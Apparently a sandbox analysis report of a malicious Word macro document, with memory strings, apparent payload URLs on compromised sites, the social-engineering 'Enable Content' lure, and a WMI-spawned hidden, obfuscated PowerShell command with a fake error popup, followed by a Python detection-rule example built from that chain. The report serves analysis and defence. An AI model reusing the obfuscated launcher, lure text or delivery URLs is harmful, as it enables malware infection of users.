Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/shop/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/11.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/12.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-B
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jp
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.j
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Ma
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogen
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://layerslider.kreaturamedia.com
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://nesaporn.mobi/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://onlyindianporn.me/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://phawayagency.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: https://phawayagency.com/wp-admin/mXo4b/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://phawayagency.comp
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://rajwap.me/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://rajwap.pro/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000005.00000002.2223573753.0000000003C23000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.comp
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://schema.org
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://schema.org/WPHeader
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://schema.org/WebPage
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://stage.thebestfikrah.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://stage.thebestfikrah.com/#website
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://stage.thebestfikrah.com/?s=
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/about-us/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/analysis/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/analysis/video-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/%E2%80%98Ilm-%E2%80%98Amal-Akhlak/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Central-Message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Islam-Today/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Tarbiyyah-Da%E2%80%99wah-Jihad/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Treasure-Seerah/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/feed/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/foreword-founder/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/issues/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/our-team/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/privacy-policy/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/solution/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/solution/video-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/terms-and-conditions/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01-100x100.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/cropped-logo-tbf-1-1.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-json/wp-statistics/v2/hit?_=1610016483&_wpnonce=abbff8401c&wp_statistic
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://tubepatrol.porn/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/thebestfikrah
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/company/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/company/contact/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/feed/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/air-cargo/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/cost-calculators/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/courier/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/ocean-cargo/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/trucking/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/track-and-trace/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-admin/admin-ajax.php
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-color.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/12/Transportation-16x16-1.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://wp-statistics.com/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://www.boldgrid.com/w3-total-cache/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://www.exactmetrics.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/thebestfikrah/?hl=en
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/channel/UCxY0oXl0BiKqF7iS16gHFhg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://xxxthtube.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: I N@m 13 ;a 10096 G)
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Very long command line found
Source: unknown Process created: Commandline size = 5389
Source: unknown Process created: Commandline size = 5293
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5293
Source: Informacion_29.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ouz_y28f7ehnqn, Function Document_open Name: Document_open
Source: Informacion_29.doc OLE indicator, VBA macros: true
Source: 00000005.00000002.2217570571.0000000001BA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2217397039.0000000000106000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine Classification label: mal96.troj.evad.winDOC@6/6@8/7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$formacion_29.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC64B.tmp
Source: Informacion_29.doc OLE indicator, Word Document stream: true
Source: Informacion_29.doc OLE document summary: title field not present or empty
Source: Informacion_29.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............-........................... .4.......4...............'.....X.'.............#...............................h.......5kU.......'.....Jump to behavior
Source: C:\Windows\System32\msg.exeConsole Write: ............-...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........'.....L.................'.....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................}...............}.......x.....`Iz........v.....................K........^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.....`......0.l.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... A...............A.............}..v....`a......0.l...............^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................X..j......................A.............}..v.... n......0.l.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................X..j....h.^...............A.............}..v.....n......0.l...............^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............(..j......................A.............}..v....`.......0.l.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............(..j..... A...............A.............}..v............0.l.............8.^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....(................A.............}..v............0.l.............h.^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j.....(................A.............}..v....(.......0.l.............h.^.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Informacion_29.doc Virustotal: Detection: 62%
Source: Informacion_29.doc ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219049704.00000000028F5000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb" source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdblog source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2219201518.0000000002B90000.00000002.00000001.sdmp
Source: Informacion_29.doc Initial sample: OLE summary subject = Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core
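The process chain above is the part of this report a detection engineer should take away: WINWORD.EXE never spawns cmd.exe itself; the macro calls Win32_Process::Create over WMI, so cmd.exe is created by the WMI provider host and the report can only list its creator as "unknown". A parent/child rule keyed on Office applications therefore misses it. What a rule built on this chain looks like, as an added example that is not part of the Joe Sandbox report: the events are constructed here in the field layout of Sysmon Event ID 1 (Image, ParentImage, CommandLine), the parent of cmd.exe is taken to be WmiPrvSE.exe (where Win32_Process::Create executes), and the 4096-byte threshold and the padded base64 are this example's choices, not values from the report.

```python
# Constructed for this example: process-creation events in Sysmon Event ID 1 shape,
# modelling the chain this report records. cmd.exe is parented by WmiPrvSE.exe because
# Win32_Process::Create, the WMI call the report attributes to WINWORD.EXE, runs inside
# the WMI provider host. The base64 is padded so the line is as long as the 5389-byte
# one the report flags under "Very long command line found".
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying "
                       "to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD " + "IAAgACQA" * 650,
    },
    {
        "Image": r"C:\Windows\System32\msg.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "msg user /v Word experienced an error trying to open the file.",
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "POwersheLL -w hidden -ENCOD " + "IAAgACQA" * 650,
    },
    {   # benign control: a scheduled task running PowerShell with an ordinary command line
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    },
]

SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
               "mshta.exe", "rundll32.exe", "regsvr32.exe"}
WMI_PROVIDER_HOST = "wmiprvse.exe"
LONG_CMDLINE = 4096   # this example's threshold; the report's two lines are 5389 and 5293 bytes


def image_name(path: str) -> str:
    """Case-folded file name of a Windows path, for comparisons against the sets above."""
    return path.rsplit("\\", 1)[-1].lower()


def tag_event(ev: dict) -> list:
    """Return the indicators one event trips; an empty list means nothing of interest."""
    image, parent = image_name(ev["Image"]), image_name(ev["ParentImage"])
    cmd = ev["CommandLine"]
    tags = []
    if image in SHELL_HOSTS and parent == WMI_PROVIDER_HOST:
        tags.append("wmi_spawned_shell")      # Office macro -> WMI -> shell; real parent hidden
    if len(cmd) >= LONG_CMDLINE:
        tags.append("very_long_cmdline")
    if image == "msg.exe" and parent in SHELL_HOSTS and "error" in cmd.lower():
        tags.append("decoy_error_dialog")     # the fake "Word experienced an error" popup
    return tags


def triage(events: list) -> dict:
    """Map event index -> tags for every event that tripped at least one indicator."""
    result = {}
    for i, ev in enumerate(events):
        tags = tag_event(ev)
        if tags:
            result[i] = tags
    return result


if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_EVENTS).items():
        print(idx, image_name(SAMPLE_EVENTS[idx]["Image"]), tags)
```

The first rule is the one that matters for this sample: it keys on the WMI provider host as parent rather than on WINWORD.EXE, so it survives the macro's choice of Win32_Process::Create. The msg.exe rule is only corroboration; the popup is the social-engineering cover that makes the victim believe Word failed rather than that something ran.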

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jwq9b1lb0hmm7 Name: Jwq9b1lb0hmm7
Document contains an embedded VBA with many randomly named variables
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High entropy of concatenated variable names
Obfuscated command line found
